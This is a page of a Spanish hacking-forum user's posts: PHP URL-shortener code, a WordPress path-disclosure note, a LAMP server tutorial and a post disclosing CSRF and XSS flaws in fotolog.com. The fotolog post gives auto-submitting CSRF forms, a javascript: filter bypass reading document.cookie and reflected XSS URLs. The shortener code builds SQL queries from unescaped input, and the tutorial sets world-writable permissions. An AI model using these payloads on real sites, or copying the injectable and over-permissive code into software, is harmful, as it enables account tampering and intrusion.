elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: 1 2 3 4 [5] 6 7 8
41  Programación / PHP / Acortador de links! en: 19 Febrero 2010, 23:15 pm
bueno, me decidi a postear el codigo de un acortador de links que hice hace poco. tuve problemas con el dominio pero ya se terminaron los tramites. el resto de la web esta en pleno desarrollo xD! pero bueno. para usarlo pueden entrar al link: http://castg.com.ar/tiny osea, para ser un acortador es un toq grande el dominio xD pero esta bueno para las sqli o para poner por ejemplo post de elhacker en el subnick del msn xD! jejejej bueno. pero ademas de poner mi link, les dejo el codigo fuente:
[les aviso que es re simple, puede tener vulnerabilidades, igual con janito24 ya andubimos probando algo, pero les agradeceria que me pongan otras mas que encuentren. si encuentran algo como para hacer flood ¬¬ como janito  >:( tengan encuenta que no es un servidor en mi pc, asi que se las arreglan con el host, igualmente es gratiutio!!!]

insert.php (ingresa la direccion a la base de datos, si ya existe, devuelve la clave de la misma) tambien guarda la ip y el dia con la hora... [para el flood xD!]
Código
  1. <?php
  2. $ref=$_SERVER["HTTP_REFERER"];
  3. $svn=$_SERVER['SERVER_NAME'];
  4. if(!preg_match("/^(http:\/\/((www\.)?$svn))/", $ref)){
  5. echo chr(172).chr(172);
  6. exit();
  7. }
  8. if(isset($_GET['uri_p']) && $_GET['uri_p']!=""){
  9. $uri_p = $_REQUEST['uri_p'];
  10. if(!preg_match("/^(ht|f)tp(s)?:\/\//", $uri_p)){
  11. $uri_p = "http://".$uri_p;
  12. }
  13. require('func.php');
  14. $mysql = mysql_connect("host","user","pass");
  15. mysql_select_db("basededatos", $mysql);
  16. $nodupli = mysql_query("SELECT * FROM datos WHERE url='".urlencode($uri_p)."'", $mysql);
  17. if(mysql_num_rows($nodupli)!=0){
  18. $resultado_nd=mysql_fetch_array($nodupli);
  19. $nuevadir="http://".$_SERVER["SERVER_NAME"].str_replace("insert.php","",$_SERVER["PHP_SELF"]).$resultado_nd['token'];
  20. echo $nuevadir;
  21. }else{
  22. $token_f=clave();
  23. $nodupli = mysql_query("SELECT * FROM datos WHERE token='$token_f'");
  24. while(mysql_num_rows($nodupli)!=0){
  25. $token_f=clave();
  26. $nodupli = mysql_query("SELECT * FROM datos WHERE token='$token_f'");
  27. }
  28. mysql_query("INSERT INTO datos (url,token,ip,date) VALUES ('".urlencode($uri_p)."','$token_f','".$_SERVER['REMOTE_ADDR']."','".date("j \d\e\l n \d\e Y \a \l\a\s h:i:s")."')", $mysql);
  29. $nuevadir="http://".$_SERVER["SERVER_NAME"].str_replace("insert.php","",$_SERVER["PHP_SELF"]).$token_f;
  30. echo $nuevadir;
  31. }
  32. }else{
  33. echo "Ingresa la direccion";
  34. }
  35. ?>
  36.  

index.php (el ajax que utilizo es uno que encontre por ahi :p ami en firefox me anda bien, no probe en otros navegadores... si tienen un mejor metodo aca toy :P)
Código
  1. <?php
  2. $pag = "
  3. <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
  4. <html>
  5. <head>
  6. <title>Castg! - Anonimizador de links</title>
  7. <link href=\"style.css\" rel=\"stylesheet\" type=\"text/css\" />
  8. <script type=\"text/javascript\">
  9. function insertar(url){ 
  10.      div_result = document.getElementById('result');
  11.      peti=getXMLHttp();  
  12.      peti.open(\"GET\", \"insert.php?uri_p=\"+url);  
  13.      peti.onreadystatechange=function() {  
  14.         if (peti.readyState==4) { 
  15. //saco la ***** de publicidad 
  16.             if(peti.responseText.split(\"\\n\")){
  17.                 resultado=peti.responseText.split(\"\\n\");
  18.             div_result.value = resultado[0];
  19.             }else{
  20.             div_result.value = peti.responseText;
  21.             }
  22.         }  
  23.     }  
  24.     peti.send(null);  
  25. }
  26. function  getXMLHttp()
  27. {
  28.   var xmlHttp
  29.  
  30.   try
  31.   {
  32.     //Firefox, Opera 8.0+, Safari
  33.     xmlHttp = new XMLHttpRequest();
  34.   }
  35.   catch(e)
  36.   {
  37.     //Internet Explorer
  38.     try
  39.     {
  40.       xmlHttp = new ActiveXObject(\"Msxml2.XMLHTTP\");
  41.     }
  42.     catch(e)
  43.     {
  44.       try
  45.       {
  46.         xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");
  47.       }
  48.       catch(e)
  49.       {
  50.         alert(\"Your browser does not support AJAX!\")
  51.         return false;
  52.       }
  53.     }
  54.   }
  55.   return xmlHttp;
  56. }
  57. </script>
  58. </head>
  59. <body>
  60. <div id=\"on\">
  61. <input type=\"text\" name=\"uri_p\" id=\"uri_p\" value=\"Ingresa la direccion\" autocomplete=\"off\" onFocus=\"if(this.value=='Ingresa la direccion'){this.value='';}\" style=\"background-color: #FFFFFF; font-size:10pt; color:#2F2F7B;\">
  62. <input type=\"button\" onclick=\"insertar(document.getElementById('uri_p').value)\" value=\"Anonimizar!\">
  63. <div>
  64. <br/>
  65. <p><span class=\"Estilo1\">Tinycastg:
  66.   </span><input name=\"result\" type=\"text\" id=\"result\" onClick=\"if(this.value!=''){this.select();}\" style=\"background-color: #CCCCCC; font-size:10pt; color: #222299;\" readonly=\"readonly\" >
  67. </div>
  68. </div>
  69. </body>
  70. </html>
  71. ";
  72. if(!isset($_GET['t'])){
  73. echo $pag;
  74. }else{
  75. $mysql = mysql_connect("host","user","pass");
  76. mysql_select_db("basededatos", $mysql);
  77. $url = mysql_query("SELECT * FROM datos WHERE token='".$_GET['t']."'");
  78. if(mysql_num_rows($url)!=0){
  79. $url = mysql_fetch_array($url);
  80. header("Location: ".urldecode($url['url']));
  81. }else{
  82. echo $pag;
  83. }
  84. }
  85. ?>
  86.  

func.php (hay una sola funcion xD pero no tenia ganas de cambiar todo el code. estuve buscando alguna encriptacion corta de unos 7 u 8 caracteres peo no encontre. asi que se me ocurrio esta forma para poder elegir la cantidad de caracteres que quiera...)

Código
  1. <?php
  2. function clave(){
  3. $chars='7539846210qazwsxedcrfvtgbyhnu7539846210jmikolpPOIUYTREWQALKJHGFDSMNBVCXZ';
  4. $l_chars=strlen($chars);
  5. $l_max=8;
  6. $clave='';
  7. for($i=0;$i<$l_max;$i++){
  8. $l_rand=rand(1,$l_chars);
  9. $clave .= substr($chars,$l_rand,1);
  10. }
  11. return $clave;
  12. }
  13. ?>
  14.  

los estilos quedan a gusto propio.. les dejo tambien por ultimo el .htaccess. esta colocado en el mismo directorio que los archivos...

Código
  1. RewriteCond %{REQUEST_FILENAME} !-f
  2. RewriteCond %{REQUEST_FILENAME} !-d
  3. #estos dos comprueban que no sean ni archivos ni directorios... lo demas ya se sabe...
  4. RewriteEngine on
  5. RewriteBase /tiny
  6. RewriteRule ^(.*) index.php?t=$1
  7. #reescribe xD, toma los datos por expresion regular y los pasa a la otra cadena (como preg_replace)


bueno, este es mi codigo. pronto estara la gran firma que te dice todos tus datos :D:D te va a decir los datos tuyos del foro y otras cosas mas :D:D: jejejje >:D

un saludo grande a todos y espero que les sea util para algo ...
42  Programación / PHP / SSi.php del smf (quien ve este tema) en: 19 Febrero 2010, 03:45 am
buenas, miren, me hicieron descubrir el archivo ssi y la verdad esta re copado! es muy versatil y estoy en un proyectito :p y lo que quiero es saber quie esta veiendo el post este por ejemplo. osea, para mi proyecto necesito saberquienes son las personas que estan viendo tal post. nose si ven en cada post aparece "jose, martin y 3 Visitantes estan viendo este tema." eso es desde el ssi no? y si no me equivoco es la funcion :
 
Código
  1. ssi_fetchPosts($post_ids, $override_permissions = false, $output_method = 'echo')

ahora, si esa es la funcion correcta, como puedo hacer funcionarla desde http://foro.elhacker.net/SSI.php?ssi_function=

porq pruebo y pruebo y no puedo! osea, como ingreso la variable : $post_ids


bueno espero que me puedan responder ;D un saludo grande
43  Media / Diseño Gráfico / emoticones de el foro en: 11 Febrero 2010, 02:25 am
bueno, cambiaron al fin los emoticones, pero les soy sincero, estan horribles xD! osea, no es q estan FEOS sino qu a mino me gustan. por eso se me ocurrio ver si un usuario comun (como por ejemplo yo) puede hacer un grupo de emoticones y despues hacemos una encuesta de cual se podrian usar, o mejor, tener un menu de que iconos queres tener, como elegimos le tema del foro en nuestro perfil, elegir un grupo de emoticones.. que les parece?
44  Seguridad Informática / Nivel Web / Full Path Disclosure en mayoria de blog WordPress en: 10 Febrero 2010, 04:37 am
bueno, navegando por un blog (el cual me llamo novato ¬¬ por un tema de indexes de apache en mi web), estaba viendo una imagen cuando se me dio por borrar el directorio y dejarlo en: http://blog.cl/wp-includes/ y le di enter, me di cuenta que me daba un full file disclosure, pero son de archivos por defecto de wordpress.
Preo cuando hago click en uno,"/class.wp-scripts.php", me tira un error tipo:

Citar
Fatal error: Class 'WP_Dependencies' not found in /home/ ¬¬ /public_html/wp-includes/class.wp-scripts.php  on line 19

el dueño de este "blog", (novato tambien de todas formas) me dice, "publicalo en el foro" y le digo "see". entonces antes que nada me fijo en otro wordpress y vo que tambien sucedia lo mismo. eso queire decir que este directorio de wordpress no tiene ningun tipo de index, el servidor (como todo apache por defecto) tiene activado los autoindexes, y el webmaster (novato¬¬) no se le dio por mirar sus directorios. al ver esto se me ocurre antes que nada como cualquier vulnerabilidad (aunque chota sea) que posteo en el foro, avisar al webmaster o al creador en este caso, porq esto es algo generico... comono encontre nignun formulario en wordpress ni tampoco ningun link o mail de contacto (que me dio un poco de bornca!) decido a informarles esto a ustedes asi porq si.

muy simple. tienen un blog que se llame powened.com/blog/, entonces le agregan un /wp-includes y ya tienen el autoindex de apache, abren algun archivo ya que muchos causan un error y tienen un full path disclosure.

no es la gran cosa, no siempre funciona, pero se los quise contar. un saludo grande ! ;)
45  Seguridad Informática / Nivel Web / Fede_cp y Castg! Simple disclosure de Fotolog.com! xD en: 7 Febrero 2010, 06:03 am
bueno bueno, que mas, les voy a contar TODO! porq quiero un post bien larguito xD! y en tambien esta en el blog este mismo post (osea apreto enviar, lo copio y pego en el blog xD!)

empiezo, taba en la casa de fede y me mostro un csrf para borrar comentarios de las fotos, bueno, pasa que este es re conocido :p y dijimos, bueno, ya encontramos 2 xss y un "ftp" de la api de fotolog(aunque no lo sepan, el genio de fede en el dominio http://si.fotolog.com/i94/ encontro que estaban habilitados los indexes de apache yse podia navegar por los codigos fuentes de fotolog xD! testigos: WHK y SDC) y los xss uno lo encontro fede hace banda en el "redirect=" del cambio de idioma y yo hace poco (solo funciona en IE) otro medio raro, pero no taban tan piolas, la cosa era encontrar mas, mejor cantidad y menos calidad. nos pusimos a ver el perfil y a modificarlo, nos dimos cuenta que no pedia contraseña como en otros casos, vimos el codigo fuente del formulario y tampoco tenia token.
Wow! copiamos el formulario y empezamos a depurar, ni bien empezamos nos tubimos que ir (para mi casa xD!) y aca (en mi casa  ;-)) despues de boludear y boludear, encontramos otro csrf, pero no depuramos nada ni tampoco usamos el otro fichero, el de la casa de fede.

entonces hoy agarro y digo (ya solito en mi casa y fede en la suya) postiemos los 2 CSRF en elhacker.net asi [ego]ven que tanto inteligentes somos![/ego] y cunado me pongo a buscar los formularios, a depurar (que llevo su tiempo la verdad!!) y todo eso, me propongo buscar mas csrf, y encontre uno mas, boludiando por el perfil tambien me di cuenta que baypaseando se puede agregar un link a: "javascript:alert(1)" y por ultimo encontre otro xss. al ver esto decimos, en que garcha subimos nuestras fotos?, y si, es una garcha. jajaj. ahora voy a poner los formularios de los CSRF seguido de como baypasear y despues donde esta el xss.
Guarda con los formularios porq se mandan solos automaticamente se abren...

1er formulario: (este modifica los datos personales...)

Código
  1. <body onload="document.update_prefs.submit()">
  2. <form id="settings" action="http://account.fotolog.com/profile" name="update_prefs" method="post" enctype="multipart/form-data">
  3. <input type="hidden" class="checkbox" id="display_bio" name="display_bio" checked value="true">
  4. <input type="hidden" id="bio_statement" name="bio_statement" wrap="virtual" value="Te cabieron el pote!">
  5. <input type="hidden" class="checkbox" id="display_image" name="display_image" checked value="false">
  6. <input type="hidden" id="image" name="image" class="lg">
  7. <input type="hidden" id="firstname" name="firstname" class="lg" value="Me ponwearon" maxlength="32">
  8. <input type="hidden" id="lastname" name="lastname" class="lg" value="Fede_cp y Castg" maxlength="32">
  9. <input type="hidden" class="radio" name="gender" id="g_0" value="0">
  10. <input type="hidden" class="radio" name="gender" id="g_1" value="1">
  11. <input type="hidden" class="radio" name="gender" id="g_2" value="2">
  12. <input type="hidden" id="profession" name="profession" class="lg" value="Ser powneado :'(" maxlength="40">
  13. <input type="hidden" class="med" name="new:plink:0:name" value="Castg! y Fede_cp son los ***** amos!" maxlength="64">
  14. <input type="hidden" class="med" name="new:plink:0:url" value="http://google.com" maxlength="64">
  15. <input type="hidden" class="med" name="new:plink:1:name" value="xss no, terrible pelotudes see!!!" maxlength="64">
  16. <input type="hidden" class="med" name="new:plink:1:url" value="javasjavascript:cript:alert(document.cookie)" maxlength="64">
  17. <input type="hidden" class="checkbox" name="delete:new:plink:0">
  18. <input type="hidden" class="checkbox" name="delete:new:plink:1">
  19. <input type="hidden" name="new:plink:1" value="1">
  20. <input type="hidden" id="country" name="country" value="_N">
  21. <input type="hidden" id="state" name="state" value="00">
  22. <input type="hidden" name="city" id="city" maxlength="128" class="med" value="El ciber mundo!">
  23. <input type="hidden" name="language" value="tr">
  24. <input type="hidden" name="new:camera:0:type" value="3">
  25. <input type="hidden" id="fotolog_description" name="fotolog_description" wrap="virtual" value=":P">
  26. <input type="hidden" name="new:camera:0:brand" value="Logitech" class="sm" maxlength="32">
  27. <input type="hidden" name="new:camera:0:model" value="¿?" class="sm" maxlength="32">
  28. <input type="hidden" type="checkbox" name="delete:new:camera:0">
  29. <input type="hidden" name="new:camera:0" value="1">
  30. <input type="hidden" id="music" name="music" wrap="virtual" class="med" value="Reggae con un fasito!">
  31. <input type="hidden" id="movies" name="movies" wrap="virtual" value="Garganta Profunda (busquen en el puto google ¬¬)">
  32. <input type="hidden" id="sports" name="sports" wrap="virtual" value="Lucha en el barro!">
  33. <input type="hidden" class="med" name="new:favlink:0:name" value="I'm cagado!" maxlength="64">
  34. <input type="hidden" class="med" name="new:favlink:0:url" value="http://google.com" maxlength="64">
  35. <input type="hidden" class="checkbox" name="delete:new:favlink:0">
  36. <input type="hidden" name="new:favlink:0" value="1">
  37. </form>
  38. </body>

2do formulario: (este modifica los colores y titulo...)

Código
  1. <body onload="document.update_prefs.submit()">
  2. <form name="update_prefs" action="http://account.fotolog.com/page_design" id="settings" method="post" enctype="multipart/form-data">
  3. <input type="hidden" name="title" value="Me cabieron el pote!">
  4. <input type="hidden" name="margin_txt_color" value="FFFFFF">
  5. <input type="hidden" name="margin_link_color" value="33FF00">
  6. <input type="hidden" name="margin_bg_color" value="FFFF00">
  7. <input type="hidden" name="text_color" value="FFFFFF">
  8. <input type="hidden" name="hyperlink_text_color" value="FFFF00">
  9. <input type="hidden" name="background_color" value="FFFF00">
  10. </form>
  11. </body>

3er formulario: (noticias por mail... "newlestter")

Código
  1. <body onload="document.update_prefs.submit()">
  2. <form name="update_prefs" method="post" enctype="multipart/form-data" id="settings">
  3. <input type="hidden" name="receive_email_digest" value="true">
  4. <input type="hidden" name="receive_updates" value="true">
  5. <input type="hidden" name="receive_newsletter" value="true">
  6. <input type="hidden" name="receive_promotionals" value="true">
  7. </form>
  8. </body>

la verdad son re boludos, pero quiera uno o no! jajaj


Bypass en URL: (el bypass lo descubrio favaloro, un medico argentino)

bueno, en http://account.fotolog.com/profile en la parte de enlaces personales ponen el nombre q se les cante, si son floggers ponegan "mail de cumbio" y pican al toq xD!, y en url si ponen javascript:alert(1); se los transforma en http://alert(1)/; entonces si ponemos javasjavascript:cript:alert(1); borra el javascript armado, uniendo los separados . entonces cuando ponen click en el "link" saltara un alert con el mesaje "1".


XSS: (aca no tengo nada para poner :p)

muy simple,
aca uno: (salta 5 veces) http://txn.fotolog.com/gift_store?u=%22%3E%3Cscript%3Ealert%28%27xss%20by%20castg%27%29;%3C/script%3E

aca otro parecido pero nomas que saltan 7 :P : http://txn.fotolog.com/gift_store?id=712&u=%22%3E%3Cscript%3Ealert(%27xss%20by%20castg%27);%3C/script%3E


bueno, este fue un capitulo de fede_castg, espero que les haya gustado y... chau. jajaj

Aviso que mande dos mails al webmaster, ahora q se jodan xD!
46  Media / Diseño Gráfico / estuche camara para sumergirla en: 4 Febrero 2010, 18:56 pm
bueno, ya desde hace un timepo venia viendo este tipo de objeto, es como un estuche o funda para la camara para poder meterla bajo el agua. estuve viendo y hay genericas. soy de argentina para que tengan una idea de mi moneda jeje. son confiables estas cosas? hay alguna marca o modelo en esencial!?
47  Seguridad Informática / Nivel Web / Vulnerabilidades en Expresiones Regulares, ¿cómo? en: 3 Febrero 2010, 23:21 pm
bueno, hace ya unos dias estoy tratando de pensar como carajo sdc encontro la vulnerabilidad xss en la expresion regular de smf:
Código
  1. $data = preg_replace(array('~(?<=[\s>\.(;\'"]|^)((?:http|https|ftp|ftps)://[\w\-_%@:|]+(?:\.[\w\-_%]+)*(?::\d+)?(?:/[\w\-_\~%\.@,\?&;=#+:\'\\\\]*|[\(\{][\w\-_\~%\.@,\?&;=#(){}+:\'\\\\]*)*[/\w\-_\~%@\?;=#}\\\\]?)~i', '~(?<=[\s>(\'<]|^)(www(?:\.[\w\-_]+)+(?::\d+)?(?:/[\w\-_\~%\.@,\?&;=#+:\'\\\\]*|[\(\{][\w\-_\~%\.@,\?&;=#(){}+:\'\\\\]*)*[/\w\-_\~%@\?;=#}\\\\])~i'), array('[url]$1[/url]', '[url=http://$1]$1[/url]'), $data);

estuve primero averiguando sobre expresiones regulares obvio xD! y una base se, ahora esto ya es avanzado.. pero como lo hiciste!?!?!?
48  Informática / Tutoriales - Documentación / Servidor en Debian + No-ip + Dominio .com.ar en: 2 Febrero 2010, 20:40 pm
bueno mas que nada esto va para los argentinos, porq no se como conseguir dominio distinto gratis. aunque tambien se necesita ser español par auna de las paginas.


El objetivo de este tutorial es:
  • Instalar Apache, Php, MySql y PhpMyAdmin en Linux Debian 5.0.
  • Instalar No-IP, configurarlo y utilizarlo para DNS dinamicas.
  • Crear un Dominio .com.ar en http://nic.ar
  • Redireccionar dominio No-IP a dominio .com.ar con CDMON.


Bueno comenzemos por el principio. traten de hacer toda la instalacion ininterrumpida para evitar cualquier error :p.
la verdad aca no vamos a usar nada de xampp ni lampp ni nada raro, todo manual. para alguien que lo alla intentado en windows es dificl configurarlo y siempre trae problemas, pero a mi me trajo problemas instalar xampp asi que opte por instalarlo manualmente.
comenzamos por abrir un terminal como root:


Instalando el server!:

Instalando Apache2:

Código
  1. apt-get install apache2

cuando termine ya podran colocar sus archivos (no php todavia) en /var/www. el archivo de configuracion de apache se encuentra en /etc/apache2/apache2.conf.


Instalando Php 5:

Código
  1. apt-get install php5

y despues:

Código
  1. apt-get install libapache2-mod-php5

y ahora ya pueden usar archivos php.

Instalando MySql:

Código
  1. apt-get install mysql-server mysql-client php5-mysql

facil hasta ahora no? jejej configuren todo lo que dice del usuario y contraseña. por defecto crea un user root sin password, yo recomiendo que utilicen una contraseña buena y segura... el archivo de configuracion se encuentra en: /etc/mysql/my.cnf

Instalando PhpMyAdmin:

Código
  1. apt-get install phpmyadmin

ahora editamos el archivo: /etc/apache2/apache2.conf poniendo
Código
  1. gedit /etc/apache2/apache2.conf
y agregamos esta linea
Código
  1. Include /etc/phpmyadmin/apache.conf

el archivo de configuracion de phpmyadmin es: /etc/phpmyadmin/


ahora por ultimo reinicimaos apache y nos fijamos si todo anda correctamente...

Código
  1. /etc/init.d/apache2 restart

privilegios:

Código
  1. chmod -R 777 /var/www/*


No-IP:

nos creamos un usuario en su pagina oficial: http://www.no-ip.com/newUser.php

y completamos nuestros datos... Nos logeamos yvamos a la parte de "Hosts/Redirects"



yo ya tengo uno hecho pero les explico como lo hice...

vamos a add host



diria que dejen el mismo dominio que les da... ponen el nombre que quieran... y dan a "Create Host" y ya tienen el dominio creado.


Instalando No-IP2:

bueno, simple tambien:

Código
  1. apt-get install noip2

configuran con sus datos y si no mal recuerdo se inicia solo, sino ponen
Código
  1. noip2

y ya entrando a el dominio que configuraron tendria que decir "IT'S WORKS".


Creando dominio en nic.ar:


vamos a registrar dominio, ponen el nombre de su dominio y si quieren cambian el subdominio, cada subdominio varian los datos que tienen que ingresar despues...

seleccionan la entidad registrante osea ustedes, si nunca habian realizado esto ponen nueva entidaad y completan los cambios. lo mismo en el siguiente paso.

despus ponen en "delegar" y ponen estos datos: (nomas dos)
# ns1.cdmon.net  212.36.74.129
# ns2.cdmon.net  212.36.75.129
# ns3.cdmon.net  213.186.58.203

ponen en delegar y les va a llegar un mail que lo tienen que reenviar al mail "emisor". despues tendran que esperar aproximadamente unos dos dias a que se terminen todos los tramites...


Creando usuario en CDMon:

bueno, esta es una pagina española, completen con sus datos reales aunque digan que sean en españa, igual la pagina dice que su ip queda registrada. todo esto por motivos de seguridad y por si algun vivo te juankea la pc ¬¬. vamos a la pagina de registro https://www.cdmon.com/cas/pcontrol/alta.php y completamos todos los datos, un ejemplo de nif es : A28555456, porfavor si algun español me dice si esto de poner un nif es ilegal lo borro al instante...

se dan de alta, activan la cuenta con un email que te manda la web.. y empezamos a configurar.

les quiero decir que haciendo el post me di cuenta que se podia hacer todo directamente con cdmon, pero no se como hacerlo :p mas adelante hago otro de ultima... jejejej.

se logean y van a DNS Estatica. en la parte de "->Nuevo dominio en el servidor DNS" ponen el nombre de su dominio .com.ar. si se fijan un poquito mas abajo estan las dns que les di... presionan en añadir y ven que se agrego el dominio a una lista, apretan en el dominio y ponen gestionar...

ponen en "Redireccion URL". en "direccion url" ponen el nombre de su dominio no-ip, mi ejemplo castg.no-ip.biz. ahora en la parte de "HEAD" pueden modificar oviamente el <head> ;D jejej por ejemploponerle un title porq por defecto no dice anda. ponen en guardar y LISTO! talvez tengan que esperar unpoco.

bueno, este es el final del tutorial. pueden ver un ejemplo mio: http://castg.com.ar

la pagina principal se parece a la de wamp pero la modifique asi tambien me dice los archivos. si les gusta aca tienen el codigo: (yo le puse una autentificacion http asi no cualquiera ve mis archivos :P!)

les aviso que falta completa depuracion. jajaj pero como es personal jejej.
me base tambien en el metodo de tener las imagenes en el mismo archivo

Código
  1. <?php
  2. $log = false;
  3. if(!isset($_SERVER['PHP_AUTH_USER'])){
  4. Header('WWW-Authenticate: Basic realm="Para ver los contenidos tenes que estar autorizado"');
  5. exit();
  6. }elseif($_SERVER['PHP_AUTH_USER']=="usuario" && $_SERVER['PHP_AUTH_PW']=='pass'){
  7. $log = true;
  8. }
  9. $server = $_SERVER["SERVER_NAME"];
  10.  
  11. // repertoires à  ignorer dans les projets
  12.  
  13. $projectsListIgnore = array ('.','..');
  14.  
  15.  
  16.  
  17.  
  18.  
  19. // textes
  20.  
  21. $langues = array(
  22.  
  23. 	'en' => array(
  24.  
  25. 		'langue' => 'Español',
  26.  
  27. 		'autreLangue' => 'Version franchute',
  28.  
  29. 		'autreLangueLien' => 'fr',
  30.  
  31. 		'titreHtml' => 'WAMPSERVER Homepage',
  32.  
  33. 		'titreConf' => 'Configuracion del server',
  34.  
  35. 		'versa' => 'Apache Version :',
  36.  
  37. 		'versp' => 'PHP Version :',
  38.  
  39. 		'versm' => 'MySQL Version :',
  40.  
  41. 		'phpExt' => 'Extensiones disponibles: ',
  42.  
  43. 		'titrePage' => 'Herramientas',
  44.  
  45. 		'txtProjet' => 'Mis proyectos',
  46.  
  47. 		'txtNoProjet' => 'No projects yet.<br />To create a new one, just create a directory in \'www\'.',
  48.  
  49. 		'txtAlias' => 'Aliases',
  50.  
  51. 		'txtNoAlias' => 'No Alias yet.<br />To create a new one, use the WAMPSERVER menu.',
  52.  
  53. 		'faq' => 'http://www.incasoft.com.ar/'
  54.  
  55. 	),
  56.  
  57. 	'fr' => array(
  58.  
  59. 		'langue' => 'Français',
  60.  
  61. 		'autreLangue' => 'English Version',
  62.  
  63. 		'autreLangueLien' => 'en',
  64.  
  65. 		'titreHtml' => 'Accueil WAMPSERVER',
  66.  
  67. 		'titreConf' => 'Configuration Serveur',
  68.  
  69. 		'versa' => 'Version de Apache:',
  70.  
  71. 		'versp' => 'Version de PHP:',
  72.  
  73. 		'versm' => 'Version de MySQL:',
  74.  
  75. 		'phpExt' => 'Extensions Charg&eacute;es: ',
  76.  
  77. 		'titrePage' => 'Outils',
  78.  
  79. 		'txtProjet' => 'Vos Projets',
  80.  
  81. 		'txtNoProjet' => 'Aucun projet.<br /> Pour en ajouter un nouveau, cr&eacute;ez simplement un r&eacute;pertoire dans \'www\'.',
  82.  
  83. 		'txtAlias' => 'Vos Alias',
  84.  
  85. 		'txtNoAlias' => 'Aucun alias.<br /> Pour en ajouter un nouveau, utilisez le menu de WAMPSERVER.',
  86.  
  87. 		'faq' => 'http://www.wampserver.com/faq.php'
  88.  
  89. 	)
  90.  
  91. );
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99. // images
  100.  
  101. $pngFolder = <<< EOFILE
  102.  
  103. iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAA3NCSVQICAjb4U/gAAABhlBMVEX//v7//v3///7//fr//fj+/v3//fb+/fT+/Pf//PX+/Pb+/PP+/PL+/PH+/PD+++/+++7++u/9+vL9+vH79+r79+n79uj89tj89Nf889D88sj78sz78sr58N3u7u7u7ev777j67bL67Kv46sHt6uP26cns6d356aP56aD56Jv45pT45pP45ZD45I324av344r344T14J734oT34YD13pD24Hv03af13pP233X025303JL23nX23nHz2pX23Gvn2a7122fz2I3122T12mLz14Xv1JPy1YD12Vz02Fvy1H7v04T011Py03j011b01k7v0n/x0nHz1Ejv0Hnuz3Xx0Gvz00buzofz00Pxz2juz3Hy0TrmznzmzoHy0Djqy2vtymnxzS3xzi/kyG3jyG7wyyXkwJjpwHLiw2Liw2HhwmDdvlXevVPduVThsX7btDrbsj/gq3DbsDzbrT7brDvaqzjapjrbpTraojnboTrbmzrbmjrbl0Tbljrakz3ajzzZjTfZijLZiTJdVmhqAAAAgnRSTlP///////////////////////////////////////8A////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////9XzUpQAAAAlwSFlzAAALEgAACxIB0t1+/AAAAB90RVh0U29mdHdhcmUATWFjcm9tZWRpYSBGaXJld29ya3MgOLVo0ngAAACqSURBVBiVY5BDAwxECGRlpgNBtpoKCMjLM8jnsYKASFJycnJ0tD1QRT6HromhHj8YMOcABYqEzc3d4uO9vIKCIkULgQIlYq5haao8YMBUDBQoZWIBAnFtAwsHD4kyoEA5l5SCkqa+qZ27X7hkBVCgUkhRXcvI2sk3MCpRugooUCOooWNs4+wdGpuQIlMDFKiWNbO0dXTx9AwICVGuBQqkFtQ1wEB9LhGeAwDSdzMEmZfC0wAAAABJRU5ErkJggg==
  104.  
  105. EOFILE;
  106.  
  107. $pngFolderGo = <<< EOFILE
  108.  
  109. iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAJISURBVDjLpZPLS5RhFIef93NmnMIRSynvgRF5KWhRlmWbbotwU9sWLupfCBeBEYhQm2iVq1oF0TKIILIkMgosxBaBkpFDmpo549y+772dFl5bBIG/5eGch9+5KRFhOwrYpmIAk8+OjScr29uV2soTotzXtLOZLiD6q0oBUDjY89nGAJQErU3dD+NKKZDVYpTChr9a5sdvpWUtClCWqBRxZiE/9+o68CQGgJUQr8ujn/dxugyCSpRKkaw/S33n7QQigAfxgKCCitqpp939mwCjAvEapxOIF3xpBlOYJ78wQjxZB2LAa0QsYEm19iUQv29jBihJeltCF0F0AZNbIdXaS7K6ba3hdQey6iBWBS6IbQJMQGzHHqrarm0kCh6vf2AzLxGX5eboc5ZLBe52dZBsvAGRsAUgIi7EFycQl0VcDrEZvFlGXBZshtCGNNa0cXVkjEdXIjBb1kiEiLd4s4jYLOKy9L1+DGLQ3qKtpW7XAdpqj5MLC/Q8uMi98oYtAC2icIj9jdgMYjNYrznf0YsTj/MOjzCbTXO48RR5XaJ35k2yMBCoGIBov2yLSztNPpHCpwKROKHVOPF8X5rCeIv1BuMMK1GOI02nyZsiH769DVcBYXRneuhSJ8I5FCmAsNomrbPsrWzGeocTz1x2ht0VtXxKj/Jl+v1y0dCg/vVMl4daXKg12mtCq9lf0xGcaLnA2Mw7hidfTGhL5+ygROp/v/HQQLB4tPlMzcjk8EftOTk7KHr1hP4T0NKvFp0vqyl5F18YFLse/wPLHlqRZqo3CAAAAABJRU5ErkJggg==
  110.  
  111. EOFILE;
  112.  
  113. $gifLogo = <<< EOFILE
  114.  
